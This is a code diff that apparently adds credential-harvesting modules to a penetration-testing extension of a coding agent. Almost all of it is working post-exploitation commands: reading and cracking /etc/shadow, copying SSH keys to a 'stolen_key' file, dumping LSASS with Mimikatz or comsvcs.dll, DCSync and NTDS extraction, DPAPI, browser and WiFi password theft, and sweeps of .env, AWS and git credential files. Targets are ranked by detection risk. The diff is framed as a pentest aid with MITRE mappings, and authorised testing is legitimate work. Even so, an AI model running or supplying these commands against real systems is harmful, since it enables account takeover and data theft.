+      expectedTypes: PostExploitTypes.CredentialType[]
+      accessLevel: "user" | "admin" | "system"
+      detectionRisk: PostExploitTypes.DetectionRisk
+    }>
+  > = {
+    linux: {
+      shadow: {
+        description: "Linux password hashes",
+        paths: ["/etc/shadow"],
+        expectedTypes: ["hash_sha"],
+        accessLevel: "admin",
+        detectionRisk: "low",
+      },
+      ssh_keys: {
+        description: "SSH private keys",
+        paths: [
+          "~/.ssh/id_rsa",
+          "~/.ssh/id_ed25519",
+          "~/.ssh/id_ecdsa",
+          "~/.ssh/id_dsa",
+          "/root/.ssh/id_*",
+          "/home/*/.ssh/id_*",
+        ],
+        expectedTypes: ["ssh_key"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      history: {
+        description: "Command history with potential passwords",
+        paths: [
+          "~/.bash_history",
+          "~/.zsh_history",
+          "~/.mysql_history",
+          "~/.psql_history",
+          "/root/.*_history",
+          "/home/*/.*_history",
+        ],
+        expectedTypes: ["password"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      config_files: {
+        description: "Configuration files with credentials",
+        paths: [
+          "~/.netrc",
+          "~/.my.cnf",
+          "~/.pgpass",
+          "/etc/mysql/my.cnf",
+          "/var/www/*/wp-config.php",
+          "/var/www/*/.env",
+          "/opt/*/.env",
+          "/home/*/.env",
+        ],
+        expectedTypes: ["password", "api_key"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      env_vars: {
+        description: "Environment variables",
+        paths: [
+          "/proc/*/environ",
+          "~/.bashrc",
+          "~/.bash_profile",
+          "~/.profile",
+          "/etc/environment",
+        ],
+        expectedTypes: ["password", "api_key"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      keyrings: {
+        description: "GNOME/KDE keyrings",
+        paths: [
+          "~/.local/share/keyrings/",
+          "~/.kde/share/apps/kwallet/",
+        ],
+        expectedTypes: ["password"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      memory: {
+        description: "Process memory dumps",
+        paths: [
+          "/proc/*/maps",
+          "/proc/*/mem",
+        ],
+        expectedTypes: ["password", "hash_ntlm"],
+        accessLevel: "admin",
+        detectionRisk: "medium",
+      },
+    },
+    windows: {
+      sam: {
+        description: "Local Windows password hashes",
+        paths: [
+          "C:\\Windows\\System32\\config\\SAM",
+          "C:\\Windows\\System32\\config\\SYSTEM",
+        ],
+        expectedTypes: ["hash_ntlm", "hash_lm"],
+        accessLevel: "system",
+        detectionRisk: "medium",
+      },
+      lsass: {
+        description: "LSASS process memory (live credentials)",
+        paths: ["lsass.exe process"],
+        expectedTypes: ["password", "hash_ntlm", "kerberos_ticket"],
+        accessLevel: "admin",
+        detectionRisk: "high",
+      },
+      ntds: {
+        description: "Active Directory database (domain controller)",
+        paths: ["C:\\Windows\\NTDS\\ntds.dit"],
+        expectedTypes: ["hash_ntlm"],
+        accessLevel: "admin",
+        detectionRisk: "high",
+      },
+      dpapi: {
+        description: "DPAPI protected secrets",
+        paths: [
+          "%APPDATA%\\Microsoft\\Credentials\\",
+          "%LOCALAPPDATA%\\Microsoft\\Credentials\\",
+          "%SYSTEMROOT%\\System32\\config\\systemprofile\\AppData\\",
+        ],
+        expectedTypes: ["password"],
+        accessLevel: "user",
+        detectionRisk: "medium",
+      },
+      registry: {
+        description: "Registry stored credentials",
+        paths: [
+          "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon",
+          "HKLM\\SECURITY\\Policy\\Secrets",
+          "HKCU\\Software\\*\\*password*",
+        ],
+        expectedTypes: ["password"],
+        accessLevel: "admin",
+        detectionRisk: "low",
+      },
+      credential_manager: {
+        description: "Windows Credential Manager",
+        paths: [
+          "%LOCALAPPDATA%\\Microsoft\\Credentials\\",
+          "Credential Manager Store",
+        ],
+        expectedTypes: ["password"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      browser: {
+        description: "Browser stored passwords",
+        paths: [
+          "%LOCALAPPDATA%\\Google\\Chrome\\User Data\\Default\\Login Data",
+          "%APPDATA%\\Mozilla\\Firefox\\Profiles\\*\\logins.json",
+          "%LOCALAPPDATA%\\Microsoft\\Edge\\User Data\\Default\\Login Data",
+        ],
+        expectedTypes: ["browser_password"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      kerberos: {
+        description: "Kerberos tickets in memory",
+        paths: ["Memory/LSASS"],
+        expectedTypes: ["kerberos_ticket"],
+        accessLevel: "admin",
+        detectionRisk: "medium",
+      },
+      vault: {
+        description: "Windows Vault",
+        paths: ["%LOCALAPPDATA%\\Microsoft\\Vault\\"],
+        expectedTypes: ["password"],
+        accessLevel: "user",
+        detectionRisk: "low",
+      },
+      wifi: {
+        description: "WiFi passwords",
+        paths: [
+          "%PROGRAMDATA%\\Microsoft\\Wlansvc\\Profiles\\Interfaces\\",
+          "netsh wlan",
+        ],
+        expectedTypes: ["wifi_password"],
+        accessLevel: "admin",
+        detectionRisk: "low",
+      },
+    },
+  }
+
+  /**
+   * Get credential locations for a platform.
+   */
+  export function getLocations(
+    platform: PostExploitTypes.Platform,
+    accessLevel?: "user" | "admin" | "system"
+  ): PostExploitTypes.CredentialLocation[] {
+    const locations: PostExploitTypes.CredentialLocation[] = []
+    const platformLocations = CREDENTIAL_LOCATIONS[platform]
+
+    let locId = 0
+    for (const [source, info] of Object.entries(platformLocations)) {
+      // Filter by access level if specified
+      if (accessLevel) {
+        const levelOrder = { user: 0, admin: 1, system: 2 }
+        if (levelOrder[info.accessLevel] > levelOrder[accessLevel]) {
+          continue
+        }
+      }
+
+      for (const path of info.paths) {
+        locations.push({
+          id: `credloc_${++locId}_${Date.now()}`,
+          source: source as PostExploitTypes.CredentialSource,
+          platform,
+          path,
+          description: info.description,
+          expectedTypes: info.expectedTypes,
+          accessLevel: info.accessLevel,
+          extractionCommands: getExtractionCommands(platform, source as PostExploitTypes.CredentialSource),
+          tools: getRecommendedTools(platform, source as PostExploitTypes.CredentialSource),
+          risk: info.accessLevel === "system" ? "high" : info.accessLevel === "admin" ? "medium" : "low",
+          detectionRisk: info.detectionRisk,
+          mitre: getMitreForSource(source as PostExploitTypes.CredentialSource),
+          discovered: false,
+          discoveredAt: Date.now(),
+        })
+      }
+    }
+
+    return locations
+  }
+
+  /**
+   * Get extraction commands for a credential source.
+   */
+  function getExtractionCommands(
+    platform: PostExploitTypes.Platform,
+    source: PostExploitTypes.CredentialSource
+  ): string[] {
+    const commands: Record<PostExploitTypes.CredentialSource, string[]> = {
+      // Linux
+      shadow: [
+        "cat /etc/shadow",
+        "# Use John or Hashcat to crack:",
+        "john --wordlist=rockyou.txt shadow_hashes.txt",
+        "hashcat -m 1800 shadow_hashes.txt wordlist.txt",
+      ],
+      ssh_keys: [
+        "cat ~/.ssh/id_rsa",
+        "cat ~/.ssh/id_ed25519",
+        "# Copy key for use:",
+        "cp ~/.ssh/id_rsa /tmp/stolen_key",
+        "chmod 600 /tmp/stolen_key",
+      ],
+      history: [
+        "cat ~/.bash_history | grep -i pass",
+        "cat ~/.bash_history | grep -i 'mysql\\|ssh\\|su\\|sudo'",
+        'strings ~/.bash_history | grep -E "password|pass=|pwd="',
+      ],
+      config_files: [
+        "find / -name '.env' -type f 2>/dev/null | xargs cat",
+        "find / -name 'wp-config.php' 2>/dev/null | xargs grep -i password",
+        "cat ~/.netrc",
+        "cat ~/.my.cnf",
+      ],
+      env_vars: [
+        "env | grep -i pass",
+        "cat /proc/*/environ 2>/dev/null | tr '\\0' '\\n' | grep -i pass",
+        "printenv | grep -iE 'pass|key|secret|token'",
+      ],
+      keyrings: [
+        "# GNOME Keyring (requires user session)",
+        "secret-tool search --all",
+        "# Decrypt keyring files offline",
+      ],
+      memory: [
+        "# Process memory extraction (requires root)",
+        "gdb -p <pid> -batch -ex 'dump memory /tmp/mem.dump 0x00000000 0xffffffff'",
+        "strings /tmp/mem.dump | grep -i password",
+      ],
+      process: [
+        "ps aux | grep -i pass",
+        "cat /proc/*/cmdline 2>/dev/null | tr '\\0' ' ' | grep -i pass",
+      ],
+
+      // Windows
+      sam: [
+        "# Offline extraction (requires SYSTEM/SAM hives):",
+        "reg save HKLM\\SAM sam.save",
+        "reg save HKLM\\SYSTEM system.save",
+        "",
+        "# Extract with Impacket:",
+        "secretsdump.py -sam sam.save -system system.save LOCAL",
+        "",
+        "# Or use Mimikatz:",
+        "lsadump::sam /sam:sam.save /system:system.save",
+      ],
+      lsass: [
+        "# Mimikatz (requires admin):",
+        "privilege::debug",
+        "sekurlsa::logonpasswords",
+        "",
+        "# Procdump + Mimikatz:",
+        "procdump.exe -accepteula -ma lsass.exe lsass.dmp",
+        "sekurlsa::minidump lsass.dmp",
+        "sekurlsa::logonpasswords",
+        "",
+        "# comsvcs.dll method:",
+        'rundll32.exe C:\\Windows\\System32\\comsvcs.dll, MiniDump <lsass_pid> C:\\temp\\lsass.dmp full',
+      ],
+      ntds: [
+        "# Volume Shadow Copy method:",
+        "ntdsutil \"ac i ntds\" \"ifm\" \"create full c:\\temp\" q q",
+        "",
+        "# Or use secretsdump remotely:",
+        "secretsdump.py <domain>/<user>:<pass>@<dc> -just-dc",
+        "",
+        "# DCSync attack (requires DA or replication rights):",
+        "lsadump::dcsync /domain:<domain> /all /csv",
+      ],
+      dpapi: [
+        "# Mimikatz DPAPI decryption:",
+        "dpapi::cred /in:<path_to_credential>",
+        "dpapi::masterkey /in:<path> /sid:<SID> /password:<password>",
+        "",
+        "# SharpDPAPI:",
+        "SharpDPAPI.exe credentials",
+        "SharpDPAPI.exe backupkey",
+      ],
+      registry: [
+        "# Check autologon credentials:",
+        'reg query "HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon"',
+        "",
+        "# Search for passwords in registry:",
+        "reg query HKLM /f password /t REG_SZ /s",
+        "reg query HKCU /f password /t REG_SZ /s",
+      ],
+      credential_manager: [
+        "# List stored credentials:",
+        "cmdkey /list",
+        "",
+        "# Mimikatz:",
+        "vault::cred",
+        "vault::list",
+        "",
+        "# SharpDPAPI:",
+        "SharpDPAPI.exe credentials",
+      ],
+      browser: [
+        "# Chrome passwords (requires user context):",
+        "# Use SharpChrome or browser-specific tools",
+        "",
+        "# Firefox:",
+        "# Copy key4.db and logins.json for offline extraction",
+        "",
+        "# LaZagne (multi-browser):",
+        "lazagne.exe browsers",
+      ],
+      kerberos: [
+        "# Mimikatz ticket extraction:",
+        "sekurlsa::tickets /export",
+        "",
+        "# Rubeus:",
+        "Rubeus.exe dump",
+        "Rubeus.exe triage",
+      ],
+      vault: [
+        "# Mimikatz:",
+        "vault::cred",
+        "",
+        "# VaultCmd (native):",
+        "vaultcmd /listcreds",
+      ],
+      wifi: [
+        "# Native method:",
+        'netsh wlan show profiles',
+        'netsh wlan show profile name="<SSID>" key=clear',
+        "",
+        "# Export all WiFi passwords:",
+        'for /f "tokens=2 delims=:" %a in (\'netsh wlan show profiles ^| findstr Profile\') do netsh wlan show profile %a key=clear',
+      ],
+
+      // Common
+      files: [
+        "# Search for password files:",
+        'findstr /si password *.txt *.xml *.ini *.config',
+        "find / -name '*password*' -type f 2>/dev/null",
+      ],
+      database: [
+        "# Varies by database type",
+        "# MySQL: SELECT user,password FROM mysql.user",
+        "# PostgreSQL: SELECT usename,passwd FROM pg_shadow",
+      ],
+      application: [
+        "# Application-specific credential extraction",
+        "# Check application documentation",
+      ],
+    }
+
+    return commands[source] || ["# No specific extraction commands available"]
+  }
+
+  /**
+   * Get recommended tools for credential extraction.
+   */
+  function getRecommendedTools(
+    platform: PostExploitTypes.Platform,
+    source: PostExploitTypes.CredentialSource
+  ): string[] {
+    const linuxTools: Record<string, string[]> = {
+      shadow: ["john", "hashcat"],
+      ssh_keys: [],
+      history: ["grep", "strings"],
+      config_files: ["grep", "find"],
+      env_vars: ["strings"],
+      keyrings: ["secret-tool"],
+      memory: ["gdb", "strings"],
+      process: ["ps", "strings"],
+    }
+
+    const windowsTools: Record<string, string[]> = {
+      sam: ["mimikatz", "secretsdump.py", "reg"],
+      lsass: ["mimikatz", "procdump", "comsvcs.dll"],
+      ntds: ["secretsdump.py", "mimikatz", "ntdsutil"],
+      dpapi: ["mimikatz", "SharpDPAPI"],
+      registry: ["reg"],
+      credential_manager: ["mimikatz", "cmdkey", "SharpDPAPI"],
+      browser: ["SharpChrome", "lazagne", "HackBrowserData"],
+      kerberos: ["mimikatz", "Rubeus", "ticketConverter.py"],
+      vault: ["mimikatz", "vaultcmd"],
+      wifi: ["netsh"],
+    }
+
+    if (platform === "linux") {
+      return linuxTools[source] || []
+    } else {
+      return windowsTools[source] || []
+    }
+  }
+
+  /**
+   * Get MITRE ATT&CK techniques for a credential source.
+   */
+  function getMitreForSource(source: PostExploitTypes.CredentialSource): string[] {
+    const mitre: Record<PostExploitTypes.CredentialSource, string[]> = {
+      shadow: [PostExploitTypes.MITRE_CREDS.OS_CREDENTIAL_DUMPING],
+      ssh_keys: [PostExploitTypes.MITRE_CREDS.SSH_KEYS],
+      history: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      config_files: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      env_vars: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      keyrings: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      memory: [PostExploitTypes.MITRE_CREDS.OS_CREDENTIAL_DUMPING],
+      process: [PostExploitTypes.MITRE_CREDS.OS_CREDENTIAL_DUMPING],
+      sam: [PostExploitTypes.MITRE_CREDS.SAM],
+      lsass: [PostExploitTypes.MITRE_CREDS.LSASS_MEMORY],
+      ntds: [PostExploitTypes.MITRE_CREDS.NTDS],
+      dpapi: [PostExploitTypes.MITRE_CREDS.DPAPI],
+      registry: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      credential_manager: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      browser: [PostExploitTypes.MITRE_CREDS.BROWSER_CREDS],
+      kerberos: [PostExploitTypes.MITRE_CREDS.KERBEROASTING],
+      vault: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      wifi: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      files: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      database: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+      application: [PostExploitTypes.MITRE_CREDS.CREDENTIAL_FILES],
+    }
+
+    return mitre[source] || []
+  }
+
+  /**
+   * Format credential locations for display.
+   */
+  export function formatLocations(locations: PostExploitTypes.CredentialLocation[]): string {
+    if (locations.length === 0) {
+      return "No credential locations discovered."
+    }
+
+    const lines: string[] = []
+    lines.push(`Found ${locations.length} potential credential location(s):`)
+    lines.push("")
+
+    // Group by source
+    const bySource = new Map<string, PostExploitTypes.CredentialLocation[]>()
+    for (const loc of locations) {
+      const existing = bySource.get(loc.source) || []
+      existing.push(loc)
+      bySource.set(loc.source, existing)
+    }
+
+    for (const [source, locs] of bySource) {
+      lines.push(`[${source.toUpperCase()}] (${locs.length} location${locs.length > 1 ? "s" : ""})`)
+      for (const loc of locs) {
+        lines.push(`  Path: ${loc.path}`)
+        lines.push(`  Access: ${loc.accessLevel} | Detection: ${loc.detectionRisk}`)
+        lines.push(`  Types: ${loc.expectedTypes.join(", ")}`)
+      }
+      lines.push("")
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/creds/index.ts b/packages/opencode/src/pentest/postexploit/creds/index.ts
new file mode 100644
index 00000000000..dfbeebf7091
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/creds/index.ts
@@ -0,0 +1,203 @@
+/**
+ * @fileoverview Credential Harvesting Module
+ *
+ * Exports for credential discovery and platform-specific harvesting guidance.
+ *
+ * @module pentest/postexploit/creds
+ */
+
+export { CredentialDiscovery } from "./discovery"
+export { LinuxCreds } from "./linux"
+export { WindowsCreds } from "./windows"
+
+import { CredentialDiscovery } from "./discovery"
+import { LinuxCreds } from "./linux"
+import { WindowsCreds } from "./windows"
+import { PostExploitTypes } from "../types"
+
+/**
+ * Unified credential harvesting interface.
+ */
+export namespace Creds {
+  /**
+   * Get credential locations for a platform.
+   */
+  export function getLocations(
+    platform: PostExploitTypes.Platform,
+    accessLevel?: "user" | "admin" | "system"
+  ): PostExploitTypes.CredentialLocation[] {
+    return CredentialDiscovery.getLocations(platform, accessLevel)
+  }
+
+  /**
+   * Get platform-specific harvesting guidance.
+   */
+  export function getGuidance(platform: PostExploitTypes.Platform): string {
+    if (platform === "linux") {
+      return LinuxCreds.formatGuidance()
+    } else {
+      return WindowsCreds.formatGuidance()
+    }
+  }
+
+  /**
+   * Get quick discovery commands.
+   */
+  export function getQuickCommands(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return LinuxCreds.getQuickDiscoveryCommands()
+    } else {
+      return WindowsCreds.getQuickDiscoveryCommands()
+    }
+  }
+
+  /**
+   * Get all discovery commands for a platform.
+   */
+  export function getDiscoveryCommands(platform: PostExploitTypes.Platform): string[] {
+    return getQuickCommands(platform)
+  }
+
+  /**
+   * Get commands for a specific credential source.
+   */
+  export function getSourceCommands(
+    platform: PostExploitTypes.Platform,
+    source: PostExploitTypes.CredentialSource
+  ): string[] {
+    if (platform === "linux") {
+      switch (source) {
+        case "shadow": return LinuxCreds.getShadowCommands()
+        case "ssh_keys": return LinuxCreds.getSSHKeyCommands()
+        case "history": return LinuxCreds.getHistoryCommands()
+        case "config_files": return LinuxCreds.getConfigFileCommands()
+        case "env_vars": return LinuxCreds.getEnvVarCommands()
+        case "memory": return LinuxCreds.getMemoryCommands()
+        default: return []
+      }
+    } else {
+      switch (source) {
+        case "sam": return WindowsCreds.getSAMCommands()
+        case "lsass": return WindowsCreds.getLSASSCommands()
+        case "ntds": return WindowsCreds.getNTDSCommands()
+        case "dpapi": return WindowsCreds.getDPAPICommands()
+        case "credential_manager": return WindowsCreds.getCredentialManagerCommands()
+        case "browser": return WindowsCreds.getBrowserCommands()
+        case "kerberos": return WindowsCreds.getKerberosCommands()
+        case "wifi": return WindowsCreds.getWiFiCommands()
+        default: return []
+      }
+    }
+  }
+
+  /**
+   * Create a credential location.
+   */
+  export function createLocation(
+    platform: PostExploitTypes.Platform,
+    source: PostExploitTypes.CredentialSource,
+    path: string,
+    options?: {
+      description?: string
+      expectedTypes?: PostExploitTypes.CredentialType[]
+      accessLevel?: "user" | "admin" | "system"
+    }
+  ): Omit<PostExploitTypes.CredentialLocation, "id" | "discoveredAt"> {
+    if (platform === "linux") {
+      return LinuxCreds.createCredentialLocation(source, path, options)
+    } else {
+      return WindowsCreds.createCredentialLocation(source, path, options)
+    }
+  }
+
+  /**
+   * Format credential locations for display.
+   * Accepts either just locations or both platform and locations for compatibility.
+   */
+  export function formatLocations(
+    platformOrLocations: PostExploitTypes.Platform | PostExploitTypes.CredentialLocation[],
+    maybeLocations?: PostExploitTypes.CredentialLocation[]
+  ): string {
+    // Handle both calling conventions
+    const locations = Array.isArray(platformOrLocations) ? platformOrLocations : maybeLocations || []
+    return CredentialDiscovery.formatLocations(locations)
+  }
+
+  /**
+   * Get recommended tools for credential harvesting.
+   */
+  export function getTools(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return [
+        "LinPEAS - Comprehensive enumeration with credential focus",
+        "mimipenguin - Memory credential extraction",
+        "LaZagne - Multi-source credential recovery",
+        "John the Ripper - Password cracking",
+        "Hashcat - GPU-accelerated password cracking",
+      ]
+    } else {
+      return [
+        "Mimikatz - Swiss army knife for Windows credentials",
+        "Rubeus - Kerberos operations",
+        "secretsdump.py - Remote/offline hash extraction",
+        "SharpDPAPI - DPAPI operations",
+        "LaZagne - Multi-source credential recovery",
+        "SharpChrome - Chrome credential extraction",
+        "pypykatz - Python Mimikatz implementation",
+      ]
+    }
+  }
+
+  /**
+   * Get credential type priority order.
+   */
+  export function getPriorityOrder(platform: PostExploitTypes.Platform): string[] {
+    if (platform === "linux") {
+      return [
+        "shadow - Password hashes (root required)",
+        "ssh_keys - Direct system access",
+        "config_files - Application credentials",
+        "history - Cleartext passwords",
+        "env_vars - Runtime secrets",
+        "memory - Live credentials",
+      ]
+    } else {
+      return [
+        "lsass - Live credentials and tickets",
+        "sam - Local account hashes",
+        "ntds - Domain account hashes",
+        "dpapi - Protected secrets",
+        "kerberos - Authentication tickets",
+        "browser - Saved passwords",
+        "credential_manager - Stored credentials",
+        "wifi - Network passwords",
+      ]
+    }
+  }
+
+  /**
+   * Get quick reference for credential harvesting.
+   */
+  export function getQuickReference(platform: PostExploitTypes.Platform): string {
+    const lines: string[] = []
+    lines.push(`${platform.toUpperCase()} CREDENTIAL HARVESTING QUICK REFERENCE`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push("Priority Order:")
+    for (const item of getPriorityOrder(platform)) {
+      lines.push(`  ${item}`)
+    }
+    lines.push("")
+    lines.push("Quick Commands:")
+    for (const cmd of getQuickCommands(platform).slice(0, 15)) {
+      lines.push(`  ${cmd}`)
+    }
+    lines.push("")
+    lines.push("Recommended Tools:")
+    for (const tool of getTools(platform)) {
+      lines.push(`  - ${tool}`)
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/postexploit/creds/linux.ts b/packages/opencode/src/pentest/postexploit/creds/linux.ts
new file mode 100644
index 00000000000..e2f17357b66
--- /dev/null
+++ b/packages/opencode/src/pentest/postexploit/creds/linux.ts
@@ -0,0 +1,340 @@
+/**
+ * @fileoverview Linux Credential Harvesting Guidance
+ *
+ * Provides guidance for credential harvesting on Linux systems including
+ * shadow files, SSH keys, configuration files, and memory extraction.
+ *
+ * @module pentest/postexploit/creds/linux
+ */
+
+import { PostExploitTypes } from "../types"
+
+/**
+ * Linux credential harvesting namespace.
+ */
+export namespace LinuxCreds {
+  /**
+   * Get shadow file extraction commands.
+   */
+  export function getShadowCommands(): string[] {
+    return [
+      "# Check access to shadow file",
+      "ls -la /etc/shadow",
+      "",
+      "# Read shadow file (requires root)",
+      "cat /etc/shadow",
+      "",
+      "# Extract just the hashes",
+      'cat /etc/shadow | cut -d: -f1,2 | grep -v "*" | grep -v "!"',
+      "",
+      "# Combine with passwd for cracking",
+      "unshadow /etc/passwd /etc/shadow > combined.txt",
+      "",
+      "# Crack with John",
+      "john --wordlist=/usr/share/wordlists/rockyou.txt combined.txt",
+      "",
+      "# Crack with Hashcat",
+      "# SHA-512 (most common): -m 1800",
+      "# SHA-256: -m 7400",
+      "# MD5: -m 500",
+      "hashcat -m 1800 hashes.txt wordlist.txt",
+    ]
+  }
+
+  /**
+   * Get SSH key discovery commands.
+   */
+  export function getSSHKeyCommands(): string[] {
+    return [
+      "# Find all SSH keys on system",
+      "find / -name 'id_rsa*' -o -name 'id_ed25519*' -o -name 'id_ecdsa*' 2>/dev/null",
+      "",
+      "# Find authorized_keys files (shows where keys can authenticate)",
+      "find / -name 'authorized_keys' 2>/dev/null",
+      "",
+      "# Find SSH config files",
+      "find / -name 'ssh_config' -o -name 'sshd_config' 2>/dev/null",
+      "",
+      "# Check current user's SSH directory",
+      "ls -la ~/.ssh/",
+      "cat ~/.ssh/id_*",
+      "",
+      "# Check all users' SSH directories",
+      "for dir in /home/*/.ssh /root/.ssh; do",
+      "  if [ -d $dir ]; then",
+      '    echo "=== $dir ==="',
+      "    ls -la $dir",
+      "    cat $dir/id_* 2>/dev/null",
+      "    cat $dir/known_hosts 2>/dev/null | cut -d' ' -f1",
+      "  fi",
+      "done",
+      "",
+      "# Parse known_hosts for potential targets",
+      "cat ~/.ssh/known_hosts | cut -d' ' -f1 | sort -u",
+      "",
+      "# SSH agent - check for loaded keys",
+      "ssh-add -l",
+      "# If agent is running, keys can be used without knowing passphrase",
+    ]
+  }
+
+  /**
+   * Get history file search commands.
+   */
+  export function getHistoryCommands(): string[] {
+    return [
+      "# Current user's bash history",
+      "cat ~/.bash_history",
+      "",
+      "# Search for passwords in history",
+      "cat ~/.bash_history | grep -i 'pass\\|pwd\\|secret\\|key'",
+      "",
+      "# Search for connection strings",
+      "cat ~/.bash_history | grep -i 'mysql\\|postgres\\|ssh\\|ftp\\|curl\\|wget'",
+      "",
+      "# Search for sudo/su commands",
+      "cat ~/.bash_history | grep -E '^sudo|^su '",
+      "",
+      "# All users' history (requires root)",
+      "for hist in /home/*/.*history /root/.*history; do",
+      '  echo "=== $hist ==="',
+      "  cat $hist 2>/dev/null | grep -i 'pass\\|pwd\\|secret\\|key\\|mysql\\|postgres'",
+      "done",
+      "",
+      "# MySQL history",
+      "cat ~/.mysql_history 2>/dev/null",
+      "",
+      "# PostgreSQL history",
+      "cat ~/.psql_history 2>/dev/null",
+      "",
+      "# Less history (may contain searched passwords)",
+      "cat ~/.lesshst 2>/dev/null",
+    ]
+  }
+
+  /**
+   * Get configuration file search commands.
+   */
+  export function getConfigFileCommands(): string[] {
+    return [
+      "# Find .env files",
+      "find / -name '.env' -type f 2>/dev/null | head -20",
+      "",
+      "# Find config files with potential credentials",
+      'find / -name "*.conf" -o -name "*.config" -o -name "*.ini" -o -name "*.cfg" 2>/dev/null | xargs grep -l -i "password\\|passwd\\|pwd" 2>/dev/null | head -20',
+      "",
+      "# WordPress configs",
+      "find / -name 'wp-config.php' 2>/dev/null",
+      "",
+      "# Database configs",
+      "cat /etc/mysql/my.cnf 2>/dev/null | grep -i pass",
+      "cat ~/.my.cnf 2>/dev/null",
+      "cat ~/.pgpass 2>/dev/null",
+      "",
+      "# Netrc file (FTP/other credentials)",
+      "cat ~/.netrc 2>/dev/null",
+      "",
+      "# Apache/Nginx configs",
+      "cat /etc/apache2/sites-enabled/* 2>/dev/null | grep -i pass",
+      "cat /etc/nginx/sites-enabled/* 2>/dev/null | grep -i pass",
+      "",
+      "# Git credentials",
+      "cat ~/.git-credentials 2>/dev/null",
+      "git config --list 2>/dev/null | grep -i credential",
+      "",
+      "# AWS credentials",
+      "cat ~/.aws/credentials 2>/dev/null",
+      "",
+      "# Docker configs",
+      "cat ~/.docker/config.json 2>/dev/null",
+    ]
+  }
+
+  /**
+   * Get environment variable search commands.
+   */
+  export function getEnvVarCommands(): string[] {
+    return [
+      "# Current environment",
+      "env | grep -iE 'pass|pwd|key|secret|token|api'",
+      "",
+      "# Process environments (requires root for other users)",
+      "cat /proc/*/environ 2>/dev/null | tr '\\0' '\\n' | grep -iE 'pass|pwd|key|secret|token|api' | sort -u",
+      "",
+      "# Check shell profiles for exports",
+      "grep -h 'export.*=' ~/.bashrc ~/.bash_profile ~/.profile /etc/profile /etc/bash.bashrc 2>/dev/null | grep -iE 'pass|pwd|key|secret|token|api'",
+      "",
+      "# Systemd service environments",
+      "cat /etc/systemd/system/*.service 2>/dev/null | grep -i 'environment'",
+      "cat /lib/systemd/system/*.service 2>/dev/null | grep -i 'environment'",
+    ]
+  }
+
+  /**
+   * Get memory extraction commands.
+   */
+  export function getMemoryCommands(): string[] {
+    return [
+      "# Find interesting processes",
+      "ps aux | grep -iE 'mysql|postgres|ssh|apache|nginx|tomcat|redis|mongo'",
+      "",
+      "# Extract strings from process memory (requires root)",
+      "# WARNING: May crash the process",
+      "",
+      "# Using gdb (safer)",
+      "# gdb -p <pid> -batch -ex 'dump memory /tmp/mem.dump 0x00000000 0xffffffff'",
+      "",
+      "# Scan for passwords in memory dump",
+      "# strings /tmp/mem.dump | grep -iE 'password|passwd|pass='",
+      "",
+      "# Extract from running SSH agents",
+      "# SSH_AUTH_SOCK environment variable points to agent socket",
+      "# Can be used to sign with loaded keys",
+      "",
+      "# mimipenguin (requires root, may not work on all systems)",
+      "# https://github.com/huntergregal/mimipenguin",
+      "# ./mimipenguin.sh",
+    ]
+  }
+
+  /**
+   * Get credential discovery summary commands.
+   */
+  export function getQuickDiscoveryCommands(): string[] {
+    return [
+      "# Quick credential discovery script",
+      "",
+      "echo '=== Shadow Access ==='",
+      "ls -la /etc/shadow",
+      "",
+      "echo '=== SSH Keys ==='",
+      "find /home /root -name 'id_*' 2>/dev/null",
+      "",
+      "echo '=== History Files ==='",
+      "cat /home/*/.bash_history /root/.bash_history 2>/dev/null | grep -iE 'pass|mysql|ssh' | head -20",
+      "",
+      "echo '=== Config Files ==='",
+      "find / -name '.env' -o -name 'wp-config.php' -o -name '*.conf' 2>/dev/null | head -20",
+      "",
+      "echo '=== Environment Variables ==='",
+      "env | grep -iE 'pass|key|secret|token' | head -10",
+      "",
+      "echo '=== Netrc/Credentials ==='",
+      "cat ~/.netrc ~/.my.cnf ~/.pgpass ~/.aws/credentials 2>/dev/null",
+    ]
+  }
+
+  /**
+   * Create a credential location for a specific discovery.
+   */
+  export function createCredentialLocation(
+    source: PostExploitTypes.CredentialSource,
+    path: string,
+    options?: {
+      description?: string
+      expectedTypes?: PostExploitTypes.CredentialType[]
+      accessLevel?: "user" | "admin" | "system"
+    }
+  ): Omit<PostExploitTypes.CredentialLocation, "id" | "discoveredAt"> {
+    const defaults: Record<string, {
+      description: string
+      types: PostExploitTypes.CredentialType[]
+      access: "user" | "admin" | "system"
+    }> = {
+      shadow: { description: "Linux shadow password hashes", types: ["hash_sha"], access: "admin" },
+      ssh_keys: { description: "SSH private key", types: ["ssh_key"], access: "user" },
+      history: { description: "Command history with passwords", types: ["password"], access: "user" },
+      config_files: { description: "Configuration file with credentials", types: ["password", "api_key"], access: "user" },
+      env_vars: { description: "Environment variable credentials", types: ["password", "api_key"], access: "user" },
+    }
+
+    const def = defaults[source] || { description: "Credential location", types: ["password"], access: "user" as const }
+
+    return {
+      source,
+      platform: "linux",
+      path,
+      description: options?.description || def.description,
+      expectedTypes: options?.expectedTypes || def.types,
+      accessLevel: options?.accessLevel || def.access,
